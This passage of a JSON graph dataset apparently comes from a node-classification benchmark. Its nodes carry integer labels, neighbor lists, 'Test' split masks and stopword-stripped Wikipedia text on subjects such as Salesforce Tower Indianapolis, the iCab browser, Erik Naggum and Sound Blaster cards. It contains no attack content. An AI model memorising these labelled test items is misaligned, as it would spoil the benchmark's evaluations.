      5139,
      7193,
      9245,
      5155,
      7204,
      1061,
      11303,
      9256,
      11307,
      1069,
      5165,
      11309,
      11310,
      7235,
      9286,
      11338,
      1101,
      7246,
      11344,
      3159,
      7256,
      11357,
      5214,
      11361,
      9320,
      1130,
      7274,
      9330,
      3189,
      1144,
      11385,
      7292,
      7293,
      1152,
      9345,
      1156,
      5255,
      9353,
      11403,
      11406,
      11410,
      1178,
      3229,
      7326,
      11428,
      1191,
      9385,
      11442,
      1203,
      7347,
      1211,
      7355,
      5313,
      3274,
      5330,
      9431,
      3300,
      11497,
      9455,
      11506,
      5367,
      1273,
      5373,
      7421,
      5383,
      11528,
      7435,
      9484,
      9487,
      9490,
      5395,
      9491,
      5397,
      5399,
      1307,
      11552,
      7469,
      9519,
      1343,
      5440,
      1347,
      1348,
      1353,
      5450,
      7500,
      1358,
      3412,
      9557,
      7513,
      11610,
      9564,
      11615,
      11618,
      1379,
      7526,
      11625,
      9579,
      7533,
      11632,
      1401,
      3449,
      7550,
      11651,
      3462,
      5510,
      11659,
      11661,
      9614,
      5521,
      1429,
      11674,
      1435,
      7580,
      9631,
      11688,
      5546,
      11693,
      1455,
      7611,
      5564,
      7612,
      7618,
      9666,
      9671,
      7627,
      7628,
      7629,
      5588,
      1501,
      9701,
      5612,
      7662,
      9714,
      7669,
      7671,
      3582,
      9729,
      5635,
      7684,
      9733,
      7694,
      5651,
      1556,
      3609,
      5660,
      1565,
      5666,
      3625,
      7722,
      5677,
      3631,
      5679,
      1586,
      5684,
      9780,
      7734,
      1591,
      9783,
      1594,
      3642,
      9796,
      9801,
      1611,
      9808,
      3667,
      7769,
      5723,
      7780,
      9828,
      5743,
      9839,
      9842,
      1653,
      9848,
      3705,
      5754,
      5755,
      1666,
      9859,
      7812,
      3717,
      5768,
      1673,
      7816,
      9871,
      9875,
      3733,
      3734,
      5783,
      5785,
      3740,
      5791,
      3746,
      9893,
      7851,
      5806,
      3762,
      3763,
      9908,
      9914,
      5819,
      1724,
      3777,
      9925,
      5830,
      5833,
      5834,
      7882,
      7889,
      3794,
      7894,
      9944,
      5849,
      7901,
      9964,
      7917,
      5872,
      9971,
      1812,
      1813,
      3869,
      5917,
      10013,
      3876,
      7980,
      7983,
      10033,
      7987,
      1849,
      10043,
      1859,
      3907,
      3909,
      5961,
      3918,
      3931,
      10075,
      10083,
      10096,
      3960,
      8057,
      1920,
      3969,
      6016,
      6018,
      1931,
      1933,
      10125,
      1935,
      8082,
      3990,
      1947,
      6047,
      1952,
      10145,
      1960,
      8113,
      4019,
      4020,
      4024,
      6074,
      10172,
      4032,
      4042,
      8139,
      2003,
      8147,
      6102,
      10198,
      4056,
      4057,
      2010,
      2011,
      8152,
      4069,
      6119,
      8171,
      8173,
      6134,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8555,
    "label": 7,
    "text": "Salesforce_Tower_(Indianapolis):salesforce tower indianapolis opened 1990 near monument circle indianapolis salesforce tower formerly known bank one tower chase tower originally conceived american fletcher tower tallest building u.s. state indiana 58th tallest building united states surpassed aul tower oneamerica tower indianapolis distinction building twin spires pierce indianapolis skyline 49 floors office retail space 2 building equipment floors peak roof regional headquarters salesforce moved tower late-2010 currently occupies large amount space building tower two spires equal height one functional transmission antenna mast merely architectural decoration building designed klingstubbins built indianapolis-based huber hunt nichols tower step pyramidal cap reflects design indiana war memorial three blocks due north war memorial turn reflects descriptions original mausoleum height building roof specifically designed house communications relay equipment order provide additional revenue building owners past several years two large banners occasionally placed outside north south communication bullpen areas roof support two city professional sports franchises go pacers go colts signs highly visible tallest structure city tower official observation deck views city seen floors 21 27 31 32 33 35 39 40 41 43 44 common areas ohio street side tower side complex additionally views monument circle immediate downtown area seen floors 2 7 10 common areas circle side complex 2017 electronic turnstiles implemented tower security measure turn elevators longer accessible public however visitors passes attained security desk circle tower-side lobbies tower seen various spots around greater indianapolis tower originally conceived late 1970s frank e. mckinney jr. chairman american fletcher corporation holding company american fletcher national bank trust company afnb time indiana largest financial institution allow consolidation expansion company headquarters land slowly assembled building several predecessor structures along ohio street pennsylvania street demolished years early 1980s clear way mckinney hoped would soon indiana tallest office tower construction building began american fletcher became first major indianapolis bank holding company sold out-of-state financial institution agreeing spring 1986 merge ohio rapidly growing banc one corporation upon consummation merger mr. mckinney became chairman bank one indiana operations tower planning picked momentum ground broken construction began 1988 newly designated bank one center tower integrated afnb existing headquarters complex monument circle adjacent market street done mainly secure prestigious monument circle address new tower rises ohio street wabash street east-west alley market ohio thus ohio street entrance tower complex back door concourse-style passageway second level running scioto street north-south alley pennsylvania meridian connect skyscraper attached parking garage along pennsylvania street main entrance original 1960 american national bank building 111 monument circle separate skywalk across scioto connected circle building adjacent fletcher trust building 10 e. market street later removed bank moved operations formerly located structure new tower fletcher trust building subsequently sold since renovated hilton garden inn hotel banc one corporation later renamed bank one corporation went several additional major acquisitions bought j.p. morgan chase early 2000s upon consummation merger indianapolis structure renamed become known chase tower chase allowed attach name logo top building 2013 building changed owners may 6 2016 salesforce announced plans lease hundreds thousands square feet building start moving employees early 2017 building rebranded salesforce tower indianapolis",
    "neighbors": [
      10090,
      8555,
      5398
    ],
    "mask": "Test"
  },
  {
    "node_id": 8556,
    "label": 9,
    "text": "MAPPER:mapper sperry univac 'mapper 4gl originated 1970s based work 1960s kept current renamed also given extension named ice internet commerce enabler originally available sperry univac 1108 implementations also exist windows nt sun solaris linux gui windows advanced mapper maintain prepare p'roduce executive reports since officially renamed bis business information server called mapper fans began internal product first customer santa fe railway started punched card era input 80 columns data printed reports 120 132 columns attempted go beyond modeling filing cabinet typical era written assember language initially limited string manipulation since corrected macro capability also subsequently added bis product still use still job postings",
    "neighbors": [
      4042,
      2477,
      8976,
      823,
      477,
      6335
    ],
    "mask": "Test"
  },
  {
    "node_id": 8557,
    "label": 5,
    "text": "ICab:icab icab web browser mac os alexander clauss derived crystal atari browser cab atari tos compatible computers one browsers still updated classic mac os prior version discontinued version 3.0.5 2008 today classilla browser still maintained os downloadable product fully functional nagware—periodically displaying dialog box asking user register product upgrade pro version icab 2.9.9 supports 68k powerpc macintosh systems running system 7.5 mac os 9.2.2 longer maintained icab 2.9.9 still available download registration icab 2.9.8 runs natively early versions mac os x mac os x compatible versions icab 2.x longer officially available download icab 3.x run powerpc systems running mac os 8.5 mac os 9.2.2 powerpc intel systems running mac os x 10.1 later icab 3 last updated january 2008. icab 4 rewritten use cocoa api webkit rendering engine run powerpc intel systems running mac os 10.3.9 later icab 5 released june 12 2012 runs mac os 10.5 later first versions icab criticized supporting css dom icab 3 introduced improved rendering capabilities including support css2 unicode via atsui toolkit icab 4 switched webkit rendering engine giving rendering abilities apple safari browser 7 june 2009 icab 4.6 using webkit rendering engine became first desktop browser released display score 100/100 pass acid3 test apple safari 4 browser released one day later officially credited first official release browser pass acid3 test score 100/100 icab features filter manager allows users avoid downloading advertisements content currently icab comes two filters advertisements video kinds filters add features youtube video filter adds download link youtube page views icab features website developers including html validity checker automatic page refresh option web inspector dom inspector javascript debugger console icab automatic update option page rendering directly local hard disk automatically reload page changes saved disk html syntax validity checker displays smiley face status bar also optionally toolbar clicking smiley bring list errors page error report tools menu double clicking error display page source offending syntax highlighted html syntax validator first seen author earlier web browser cab icab download manager allows user start stop resume review downloads maintains download history supports downloading individual page whole site crawling many user-selectable crawl-constraint options save portable web archives zip archive containing html images files individual files local hard drive icab also contains following features",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      2076,
      9757,
      7713,
      10791,
      9770,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      576,
      5707,
      10834,
      5205,
      6231,
      8281,
      2139,
      6747,
      6237,
      1642,
      9834,
      8303,
      9841,
      115,
      9843,
      119,
      4728,
      637,
      1664,
      2182,
      11418,
      10910,
      8351,
      7340,
      9394,
      9908,
      11447,
      185,
      11449,
      4797,
      7364,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      737,
      4326,
      6377,
      4331,
      4844,
      9451,
      2290,
      11000,
      8443,
      9987,
      7943,
      1807,
      278,
      3350,
      7965,
      1834,
      7983,
      7488,
      10057,
      11082,
      2893,
      11112,
      3956,
      6528,
      3971,
      3462,
      8584,
      4490,
      6028,
      10126,
      7572,
      5026,
      4013,
      944,
      438,
      5054,
      6086,
      4048,
      5078,
      479,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      5619,
      6133,
      5622,
      5114,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 8558,
    "label": 9,
    "text": "Erik_Naggum:erik naggum erik naggum june 13 1965 – june 17 2009 norwegian computer programmer recognized work fields sgml emacs lisp since early 1990s also provocative participant various usenet discussion groups naggum made significant contributions rfc 1123 defines discusses requirements internet host software rfc 2049 defines electronic information transfer various binary formats e-mail 1999 newspaper article dagbladet interviewed aggressive confrontational participation usenet discussion groups erik later stated motto people little herd animals flocking together whenever world becomes uncomfortable … one people motto would probably herd thither hither premature death age 44 june 17 2009 caused massive bleeding ulcer related ulcerative colitis diagnosed 15 years death naggum chairman sgml sighyper sgml special interest group hypertext multimedia see hytime technical commentary iso 8879:1986 archives comp.text.sgml terms high quality sheer mass especially appreciated long painful history time article naggum describes concept universal time time zones handled well lisp code erik contributed enormous number postings usenet 14,300 record many cases erik used x-no-archive header posting parameter requesting services like google groups archive message 1995 erik started journalism watch-group project web campaigning get journalist sacked aftenposten following publication sensationalist story internet relay chat channels used trade child pornography erik naggum contributed free software project emacs text editor almost decade working group member posix.1-2008 ieee std 1003.1-2008 open group technical standard base specifications issue 7 erik listed major contributor rfc 1123 contributed requirement internet mail include four-digit representation years thus avoid y2k issues erik naggum highly controversial passionate something many subjects eagerly often harshly argued point view example rant xml misdesigned especially misused one example would diatribe martin bryan posted 1992 erik naggum hated perl passion considered perl problem problem solver disliked c++ though much hated perl generally thought c++ difficult understand degree 5 people planet truly understood hence little value humanity erik naggum several times stated stupidity rather lacking willingness individuals acquire knowledge subject argument read people arguments open mind less criminal offense known polemic aggression towards considered ignorant individuals much wrote full sarcasm irony could difficult understand truly believed general exaggerations made make point",
    "neighbors": [
      4707,
      5251,
      6502,
      8582,
      205,
      3350,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 8559,
    "label": 1,
    "text": "ObjectDatabase++:objectdatabase++ objectdatabase++ odbpp embeddable object-oriented database designed server applications require minimal external maintenance written c++ real-time isam level database ability auto recover system crashes maintaining database integrity unique transaction process allows maintenance indexes tables preventing double allocation index entries could prohibit rollback transactions features odbpp include full multi-process multi-thread transaction control auto real-time database recovery hierarchical object data design native code script access static hash index object ids numerous supported index methods including full-text biometric pattern matching odbpp supports objects hierarchical design similar xml json serialized php hierarchical object separates object databases relational cousins process keeping entire object one record rather spreading multiple tables give object databases distinction relational model traditionally databases designed relational model would separate data several tables use common identifier relate child records back parent model based row within table containing individual pieces data sql databases based design would create joins would reconnect entire relation back together suffering performance limitations object database design instead using multiple tables store data object stored one single record keeps entire object intact reducing need join data back together process storing entire object one table reduces total amount lock reads write operations required also ability store object one record reduce amount file reads writes enables object design maintain efficiency large complex database designs looking images right depicts relational model data spread two tables parent amber children blue object model parent children stored one data record information previously stored within related table stored within sub nested table foo odbpp implements transaction control allows process continue another terminated unique transaction control allows continuing process identify terminated transaction recover database integrity continue mid transaction ability terminate transaction point enables real-time transactions implementation server using method transaction control utilizes four separate file implement entire process flushed change state drive continuing next state creates time consuming process individual write file three separate states entire transaction required pass three separate files initially adds edit deletes written shared memory file enables transaction know resource index value allocated memory file destroy os starts without interfering database integrity used ipc purposes transaction call commit transaction method database bulk work writes entire transaction memory file log file done three stages process first identify changes needed flushed plans rear file written drive header updated indicate presences update secondly file updated finally header modified finalized update state process ensure consistency file always valid process ceases first stage file simply truncated file returned original state transaction ceases second stage next transaction opens file identifies saved plans re-executes saved instructions four files updated manner transaction starts memory file written one update log file transaction protection transaction secured log file odbms able update index table files entire commit process executed concurrently multiple transactions committing simultaneously greatly benefited using solid-state drive although process caching entire transaction memory file committing drive end help reduce entire transaction time comparable non-flushing dbms contrary earlier object database models isam level database odbpp supports large variety indexes initial development object model basic design use schema contained serialized binary object referred id provided index access prevented basic search labels done due fact underlining architecture still based related model since odbpp always designed object model understands hierarchical nature objects capable indexing data contained within objects within database referenced object identifier managed via static hash index static hash index simply array index location containing address object deduced taking id value multiplying 12 adding offset value reveals location physical address object method translating id physical address enables true order one 1 retrieval data regardless many objects stored within database imposing static index table schemata allows real-time compaction file object locks index object allows even locked objects moved within file transactions require space deleting objects file ability move objects within file time also imposes need access via index sql databases may scan records scanning file beginning end real-time compaction prohibits style access b+ tree index primary workhorse databases odbpp exception majority searches carried via seeking index position repetitively call next largest value odbpp supports large number filters b+ tree make results usable example set convert lower case characters upper case set removal white spaces non-alphanumerical characters also provide natural sort order 9 '10 one features odbpp standard dbms data stored within hierarchical object also indexed create situation 0…n index values created one object spatial indexes used allow searching two- three-dimensional coordinates spaces temporal indexes similar idea along one dimensional time odbpp also supports sets spatial data represent key points two three dimension objects finger print human faces sets indexed via spatial index allow group searching search create temporary index many objects least search pattern points within given error odbpp provides full text indexing via token list indexes indexes combination b+ tree bucket overflow text string broken individual tokens indexed b+ tree since multiple object token value id stored bucket overflow similar dynamic hashing design full text searches done scanning tokens b+ tree leaves identifying tokens fit search criteria retrieving matching ids full text search query also provide set logic functions reduce search results number usable allow user search objects contain token token b example odbpp designed function procedural style encapsulated object c++ style although object style still uses procedural method interface database low level example procedural method demonstrated equivalent tscript example reading object database name fooname follows objectdatabase++ also exposed via com wrapper class 'odbpplib.odbpp equivalent c example reading object database name fooname follows",
    "neighbors": [
      8644,
      9828,
      8201,
      8393,
      10413,
      7983,
      823,
      6398,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 8560,
    "label": 4,
    "text": "Cyber_sovereignty:cyber sovereignty cyber sovereignty phrase used field internet governance describe governments desire exercise control internet within borders including political economic cultural technological activities 2015 book data goliath american security expert bruce schneier says cyber sovereignty movement countries russia china france saudi arabia given enormous boost 2013 revelations widespread international nsa surveillance countries pointed justification activities evidence u.s. hypocrisy internet freedom issues",
    "neighbors": [
      1315,
      7893
    ],
    "mask": "Test"
  },
  {
    "node_id": 8561,
    "label": 3,
    "text": "Sound_Blaster:sound blaster sound blaster family sound cards de facto standard consumer audio ibm pc compatible system platform widespread transition microsoft windows 95 standardized programming interface application level eliminating importance backward compatibility sound blaster evolution pc design led onboard audio electronics commoditized pc audio functionality 1995 sound blaster cards sold 15 million units worldwide accounted seven ten sound card sales creator sound blaster singapore-based firm creative technology limited also known name united states subsidiary creative labs history creative sound cards started release creative music system c/ms ct-1300 board august 1987 contained two philips saa1099 circuits together provided 12 channels square-wave bee-in-a-box stereo sound 4 channels used noise circuits featured earlier various popular electronics magazines around world many years creative tended use off-the-shelf components manufacturers reference designs early products various integrated circuits white black paper stickers fully covering top thus hiding identity c/ms board particular philips chips white pieces paper fantasy cms-301 inscription real creative parts usually consistent ct number references surprisingly board also contained large 40-pin dip integrated circuit bearing ct 1302a ctpl 8708 creative technology programmable logic serigraphed inscription looking exactly like dsp later sound blaster chip allows software automatically detect card certain register reads writes year later 1988 creative marketed c/ms via radio shack name game blaster card identical every way precursor c/ms hardware whereas c/ms package came five floppy disks full utilities song files creative supplied single floppy basic utilities game patches allow sierra online games using sierra creative interpreter engine play music card also included later revision game silpheed added c/ms support 2017 hobbyists developed clone ct1300 pcb sound blaster 1.0 code named killer kard ct1320a released 1989 addition game blaster features 11-voice fm synthesizer using yamaha ym3812 chip also known opl2 provided perfect compatibility market leader adlib sound card gained support pc games preceding year creative used dsp acronym designate digital audio part sound blaster actually stood digital sound processor rather common digital signal processor really simple micro-controller intel mcs-51 family supplied intel matra mhs among others could play back 8-bit monaural sampled sound 23 khz sampling frequency record 8-bit 12 khz sole dsp-like features circuit adpcm decompression primitive non-mpu-401 compatible midi interface adpcm decompression schemes supported 2 1 3 1 4 1 ct1320b variety sound blaster 1.0 typically c/ms chips installed sockets rather soldered pcb though units exist c/ms chips soldered sources note original sound blaster 1.0 produced ct1310 number however topic ongoing debate creative refers ct1310 sound blaster 1.0 website spite limitations less year sound blaster became top-selling expansion card pc achieved providing fully adlib-compatible product additional features often lower price inclusion game port importance early success often forgotten overlooked pcs era include game port game port cards costly around 50 used one expansion slots pcs time given choice adlib card fully compatible sound blaster card came game port saved slot included dsp much price many consumers opted sound blaster in-game support digital portion card happen sound blaster gained dominance microsoft announced multimedia pc mpc november 1990 suggested developers use sound blaster sound card came close complying mpc standard press speculated microsoft based mpc standard sound blaster specifications 1993 computer gaming world wondered would gamer buy competing adlib card sound blaster-compatible creative advertised sound blaster 16 16-bit sound standard slogan get real emphasizing real 100 sound blaster compatibility rhetorically asking manufacturers spend much time comparing sound blaster compute 1989 stated sound blaster ibm-compatible computers taken lead sound music personal computers naming compute choice magazine described quality opening music space quest iii card extraordinary praising quality compared roland mt-32 ad lib versions compute approved card dma creative dissemination technical information concluded more-expensive mt-32 superior sound blaster audio quality better ad lib game blaster released 1990 sound blaster 1.5 ct1320c dropped c/ms chips longer popular game developers instead board two empty sockets could user upgraded purchasing c/ms chips directly creative phillips saa-1099s another source otherwise card functions identically sound blaster 1.0 ct1320u variety layout ct1320c final revision original sound blaster sound blaster 2.0 released october 1991 ct1350 added support auto-init dma assisted producing continuous loop double-buffered sound output similar version 1.0 1.5 used 1-channel 8-bit dac however maximum sampling rate increased 44 khz playback 15 khz record dsp midi uart upgraded full-duplex offered time stamping features yet compatible mpu-401 interface used professional midi equipment sound blaster 2.0 pcb-layout used highly integrated components shrinking board size reducing manufacturing cost owners previous revision sound blaster boards could upgrade board purchasing v2.00 dsp chip creative labs swapping older dsp v1.0x newer replacement upgraded board gained auto-init dma new midi capabilities sound blaster 2.0 expanded sampling rates upgrade necessary full compatibility windows 3.0 multimedia extensions upgrade sound blaster mcv ct5320 version created ibm ps/2 model 50 higher isa-incompatible micro channel architecture bus mcv soundblaster issues outputting audio running ps/2s cpus running faster 16 mhz however joystick interface still inoperable ps/2s designed due slow-speed schottky chips installed none timing issues affect yamaha ym3812 mcv soundblasters released faster schottkys eradicated problems model ct1330 announced may 1991 first significant redesign card core features complied microsoft mpc standard.. sound blaster pro supported faster digital input output sampling rates 22.05 khz stereo 44.1 khz mono added mixer provide crude master volume control independent volume sound sources feeding mixer crude high pass low pass filter sound blaster pro used pair ym3812 chips provide stereo music-synthesis one channel sound blaster pro fully backward compatible original sound blaster line extension adlib sound card sound blaster pro first creative sound card built-in cd-rom interface sound blaster pro cards featured proprietary interface panasonic matsushita mke drive sound blaster pro cards basically 8-bit isa cards use lower 8 data bits isa bus first glance appears 16-bit isa card 'fingers data transfer higher portion bus connector uses 16-bit extension isa bus provide user additional choice irq 10 dma 0 channel found 16-bit portion edge connector short lived joint developed project creative tandy resulted creative/tandy multimedia sound adapter 849-3030 sound blaster pro derived card factory installed tandy multimedia pcs combined ct1330 tandy joystick midi ports mpu-401 compatible revised version sound blaster pro 2 ct1600 replaced ym3812s advanced yamaha ymf262 opl3 otherwise functionally identical original sound blaster pro shortly release sound blaster pro 2 version creative discontinued original sound blaster pro sound blaster pro 2 also sold following on-board cd-rom controllers packaged sound blaster cards initially marketed sold retail-channel creative domination pc audiocard business soon selling sound blaster pro 2 oem ct1680 customers integration pre-assembled pcs creative also sold multimedia upgrade kits containing sound blaster pro kit bundled sound card matsushita cd-rom drive model 531 single-speed 562/3 later double-speed 2x drives several cd-roms multimedia software titles cd-rom technology new kit included cd-rom software representing good value customers one kit named omnicd included 2x matsushita drive along isa controller card software including software toolworks encyclopedia aldus photostyler se compliant mpc level 2 standard sound blaster pro 2 mcv ct5330 version created ibm ps/2 model 50 higher microchannel bus next model sound blaster 16 announced june 1992 introduced sound blaster 16 retained yamaha opl-3 fm synthesis backward compatible programming interface software titles written older sound blasters sound blaster pros would run without modification eventually design proved popular creative made pci version card creative audio revenue grew us 40 million per year nearly us 1 billion following launch sound blaster 16 related products rich sorkin general manager global business time responsible product planning product management marketing oem sales moving card isa bus already approaching obsolescence meant line host-controlled isa dma available pci slot offers line instead card used pci bus mastering transfer data main memory d/a converters since existing dos programs expected able initiate host-controlled isa dma producing sound backward compatibility older sound blaster cards dos programs required software driver work-around since work-around necessarily depended virtual 8086 mode pc cpu order catch reroute accesses isa dma controller card failed number dos games either fully compatible cpu mode needed much free conventional memory could loaded driver occupying part memory microsoft windows problem creative windows driver software could handle isa pci cards correctly sound blaster vibra16 inexpensive single-chip implementation sound blaster 16 oem market creative labs also used chip sound blaster 32 phone blaster phone blaster 28.8 vibra modem ct3120 ct3220 many value-edition cards external yamaha opl3 fm music synthesis retained earlier boards built around vibra16 vibra16s controllers whilst later common vibra16 boards used cqm creative quadratic modulation developed e-mu systems series included vibra16 ct2501 vibra16s ct2502 ct2504 vibra16c ct2505 pnp vibra16xv ct2511 chips primary advantage vibra16 inclusion 14.4 kbit/s telephony modem also functioned telephone released march 1994 sound blaster awe32 advanced waveffects introduced new midi synthesizer section based emu8000 awe32 consisted two distinct audio sections creative digital audio section audio codec optional csp/asp chip socket yamaha opl3 e-mu midi synthesizer section synthesizer section consisted emu8000 sampler effects processor emu8011 1 mb sample rom 512 kb sample ram expandable 28 mb fit new hardware awe32 full-length isa card measuring derivative awe32 design sound blaster 32 sb32 value-oriented offering creative announced june 6 1995 sb32 became new entry-level card awe32 product-line previously held awe32 value sb32 retained awe32 emu8000/emu8011 midi-synthesis engine built-in instrument rom dropped onboard ram wave blaster header csp port sb32 used vibra chip reduce component count meant bass/treble/gain control limited compared awe32 loss onboard ram offset inclusion 30-pin simm ram sockets allow 28 mb ram installed used emu engine awe32 successor sound blaster awe64 november 1996 significantly smaller half-length isa card term misleading — see pictures size comparison offered similar features awe32 also notable improvements including support greater polyphony although product 32 extra software-emulated channels 30-pin simm slots awe32/sb32 replaced proprietary memory format could expensively purchased creative main improvements better compatibility older sb models improved signal-to-noise ratio awe64 came two versions standard version later rebranded value 512kb ram gold version 4 mb ram separate s/pdif output 1998 creative acquired ensoniq corporation manufacturer audiopci card popular oems time full-featured solution wavetable midi sample-based synthesizer 4-speaker directsound3d surround sound a3d emulation dos legacy support via tsr program cheap due lack hardware acceleration full-duplex least ms windows play back several sources creative released many cards using original audiopci chip ensoniq es1370 several boards using revised versions chip es1371 es1373 creative-labeled audiopci chips boards using audiopci tech usually easily identifiable board design chip size look quite similar boards include sound blaster pci64 april 1998 pci128 july 1998 creative ensoniq audiopci vibra pci sound blaster 16 pci es137x chip contains 3 stereo sample rate converters buffers pci busmaster interface analogue interfacing done codec chip runs fixed sampling frequency 44 ensoniq audio pci 48 khz creative versions isa soundcards resampled switched different time bases es137x support soundfonts filter-less midi engine wavetable sample table sets 2 4 8mb size sound blaster live introduced august 1998 use programmable digital signal processor pc-audio unprecedented ibm already done cheap mwave sound- modem-cards turtle beach professional hurricane soundcards live built around creative new emu10k1 chip contained 2.44 million transistors advertised processing flashy 1,000 mips emu10k1 successors use on-card ram/rom storage instrument samples instead used pci busmaster interface access sample-data stored host-pc system memory a/d- d/a- converters well analogue mixing done ac'97 chip running 48 khz sampling rate members sb live family least four-channel analog audio outputs 15-pin midi/joystick multiport game titles eax 1.0 later 2.0 environmental audio extensions briefly competed defunct a3d 2.0 added hardware-accelerated acoustic effects emu10k1 provided high-quality 64-voice sample-based synthesizer a.k.a wavetable self-produced third-party customized patches soundfonts ability resample audio output input apply range real-time dsp effects set audio subchannels present device first model flagship sb/live family sb live gold featuring gold tracings major analog traces external sockets emi-suppressing printed circuit board substrate lacquer gold came standard daughterboard implemented separate 4-channel alternative mini-din digital output creative-branded internal-dac speaker sets s/p-dif digital audio input output separate software mappings fully decoded midi interface separate input output along mini-din converter gold highlighted many features aimed music composition ease-of-use plug-and-play musicians realtime loopback-recording midi-synthesizer full freedom soundfonts environmental effects reverb etc bundled midi-software mainstream model sound blaster live like gold live featured multi-speaker analog output four channels identical music/sound generation capabilities without bundled midi software interfacing-equipment later versions live usually called live 5.1 offered 5.1-channel support adds center channel speaker lfe subwoofer output useful movie watching live 5.1 could also use one 3.5 mm jack ports spdif allowed connection external decoder creative also released soundblaster live player 1024 edition identical regular soundblaster live addition extra software sound blaster pci 512 ct4790 emu10k1-based sound card designed fill lower cost segment live value capable live value features aside limited 512 midi voice polyphony software-based limitation lacking digital i/o removal expansion headers stereo quadraphonic output support card circuit layout somewhat simpler live series sound blaster audigy august 2001 featured audigy processor emu10k2 improved version emu10k1 processor shipped sound blaster live audigy could process four eax environments simultaneously upgraded on-chip dsp native eax 3.0 advanced hd support supported 5.1-channel output audigy controversially advertised 24-bit sound card emu10k2 audio transport dma engine fixed 16-bit sample precision 48 khz like emu10k1 original live audio resampled 48 khz order accepted dsp recording rendering output sound blaster audigy 2 september 2002 featured updated emu10k2 processor sometimes referred emu10k2.5 improved dma engine capable 24-bit precision 192 khz supported stereo playback/record 6.1 capped 96 khz addition audigy 2 supported 6.1 later 7.1 speakers improved signal-to-noise ratio snr audigy 106 vs. 100 decibels also featured built-in dolby digital ex 6.1 7.1 decoding improved dvd play-back audigy 2 line first sound cards receive thx certification sound blaster audigy 2 zs september 2003 essentially audigy 2 updated dac op-amps audigy 2 zs uses cirrus logic cs4382 dac together op-amps produce output snr 108 db slight printed circuit board modifications 7.1 audio support added sound blaster audigy 4 pro november 2004 audigy 2 zs updated dacs adcs new dac cirrus logic cs4398 boosting output snr 113 db breakout box distinguishable difference audigy 2 zs dsp identical audigy 2 zs creative put audigy 4 sticker cover chip making appear new chip audigy 4 pro confused audigy 4 value contains lower quality dacs golden plated jacks audigy 4 value line audigy 2 value series audigy 4 shorter life span predecessors due short window next-generation sound blaster x-fi sound blaster audigy rx september 2013 similar audigy 4 pro dedicated 600-ohm headphone amplifier pcie 1x interface sound blaster audigy fx september 2013 also features 600-ohm amplifier pcie interface lacks emu10k dsp x-fi extreme fidelity released august 2005 came xtremegamer titanium titanium fatal1ty professional titanium fatal1ty champion elite pro configurations 130 nm emu20k1 emu20k2 titanium series models audio chip operates 400 mhz 51 million transistors computational power processor i.e performance estimated 10,000 mips 24 times higher estimated performance predecessor audigy processor beginning 2008 titanium models newer x-fi cards switched pci pci express x1 connectors x-fi active modal architecture ama user choose one three optimization modes gaming entertainment creation enabling combination features chipset x-fi uses eax 5.0 supports 128 3d-positioned voices four effects applied release also included 24-bit crystallizer intended pronounce percussion elements placing emphasis low high pitched parts sound x-fi release offered powerful mixing capabilities available making powerful entry-level card home musicians big improvement x-fi previous audigy designs complete overhaul resampling engine card previous audigy cards dsps locked 48/16 meaning content match resampled card hardware done poorly resulted lot intermodulation distortion many hardcore users worked around means resampling content using high quality software decoders usually form plugin media player creative completely re-wrote resampling method used x-fi dedicated half power dsp process resulting clean resample recon3d series announced september 2011 includes recon3d pcie recon3d fatal1ty professional recon3d fatal1ty champion cards use new integrated sound core3d chip features quartet dsp x-fi series well integrated dac adc i/o interface 56-pin package asia-only recon3d professional audio basically recon3d pcie extra accessories cables recon3d series sound cards support asio recon3d comes bundled software called sbx pro studio sbx pro studio allows users adjust amount virtual surround crystallizer bass smart volume dialog plus recon3d sound cards recon3d also got crystal voice feature reduces pickup background noises like hairdryer vacuum cleaner beamforming microphone used reviews generally positive pricing small model differences raised questions especially low mid priced models recon3d pcie recon3d fatal1ty professional cosmetic differences considerable price difference fatal1ty professional adds beamforming microphone red led lights metal shroud board real hardware improvements sound blaster z-series announced august 2012 includes pci express x1 cards z zx zxr use sound core3d chip previous sound blaster recon3d series z-series improved sound quality recon3d series including dedicated audio hardware op-amps dacs adcs sound blasterx ae-5 announced june 2017 first discrete sound card made creative five years since introduction z-series card first sound blaster series use 32-bit/384 khz sabre 32 ultra dac es9016k2m along custom-designed discrete headphone amplifier 1w output power low output impedance 1 ohm provide high damping factor virtually dynamic headphone card additional rgb lighting courtesy molex power connection accompanying rgb led strip late 2017 white colored model sound card called sound blasterx ae-5 pure edition released 4 rgb led strips instead one standard black model sound blaster ae-7 released july 2019 alongside sound blaster ae-9.it equipped ess sabre 9018 dac features acm audio control module connects sound card via two audio ports available card n't feature rgb lighting contrary ae-5 n't require external power either sound blaster ae-9 announced december 2018 targeting audiophile audience soundcard equipped ess sabre 9038 dac features external audio control module connects sound card mini-hdmi cable containing xlr port microphone toggleable 48 volt phantom power rail sound card features replaceable operational amplifiers sound card external dac consumes 75w thus first sound card creative requires auxiliary power using 6-pin pci-e connector supply power external dac card officially released july 10 2019 celebrate 30 years since introduction original sound blaster sound blasterx series announced gamescom 2015 sound blasterx brand consists usb audio devices gaming headsets gaming mousepads gaming speakers discrete sound card gaming mouse gaming keyboard sound blasterx h3 h5 p5 come blasterx acoustic engine lite software blasterx acoustic engine lite software comes preset audio profiles different game types settings profiles adjustable unlike blasterx acoustic engine pro blasterx acoustic engine lite software available windows pc blasterx acoustic engine pro allows users adjust amount effects save also scout mode voice fx users bind key combinations enable/disable blasterx acoustic engine scout mode voice fx also equalizer tab software users load profiles create profiles equalizer blasterx acoustic engine pro software available windows pc sound blasterx h3 sound blasterx h5 headsets 3.5mm audio jacks sound blasterx p5 earphone inline microphone come audio/mic splitter cable sound blasterx h3 h5 p5 come software called blasterx acoustic engine lite sound blasterx h7 gaming headset usb 3.5mm jack connectivity maximum playback bitrate sample rate 24-bit 96 khz supports 7.1 virtual surround sound blasterx h7 comes blasterx acoustic engine pro software unlike sound blaster e5 built-in microphones rechargeable battery bluetooth connectivity blasterx acoustic engine profiles saved onto device windows used mac computer mac os x software well android ios apps sound blasterx g5 sound blasterx g1 uses blasterx acoustic engine pro software like sound blasterx g5 got 4-pole headphones microphone audio port maximum playback bitrate sample rate 24-bit 96 khz supports 7.1 virtual surround headphones amplifier supports headphones impedances 